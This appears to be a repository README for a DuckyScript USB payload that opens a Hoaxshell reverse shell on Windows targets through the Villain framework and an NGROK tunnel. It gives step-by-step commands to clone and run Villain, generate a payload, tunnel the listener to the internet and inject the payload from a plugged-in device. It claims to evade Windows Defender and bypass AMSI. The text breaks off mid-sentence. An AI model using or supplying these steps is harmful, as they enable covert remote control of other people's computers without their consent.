cd5b5d8ab4
|
||
|---|---|---|
| .. | ||
| media | ||
| README.MD | ||
| payload.txt | ||
README.MD
Title: Hoaxshell via Villain Payload and NGROK Tunnel
Author: HackingMark
OS: Windows
Version: 1.0
Requirements: DuckyScript 3.0, powershell, Linux Maschine with Villain, NGROK
What is Villain?
Villain is a Toolset to setup Payloads and Listener for Hoaxshell Hoaxshell is actually undetected by Windows Defender and the Payload is optimized to bypass AMSITrigger *The Powershell Payload connects the target Machine back to the Hoaxshell Server, NGROK makes this Server reachable from the Internet. * That way you can catch your session from everywhere. Once your session is established, you can open an interactive shell.
How to use this Payload
First clone Villain from Repo:
git clone https://github.com/t3l3machus/Villain
Then install Requirements:
cd Villain
pip install -r ./requirements.txt
Allow Villain to start:
chmod +x ./Villain.py
Fire it up:
./Villain.py
Generate a payload to get the session identifier:
generate os=windows lhost=0.0.0.0 lport=8080
Establish NGROK Tunnel forwarding Traffic to our Hoaxshell Engine
ngrok http 8080
Leave this Window open
Preparing the Payload:
You need 2 Values from above: NGROK HTTPS Link and Session Identifier from Villain
Put it into the Payload then compile it to inject.bin and download.
Copy your Inject.bin to your Ducky!
Plug your Ducky into a Windows target.
Achieve reverse shell.
open a shell with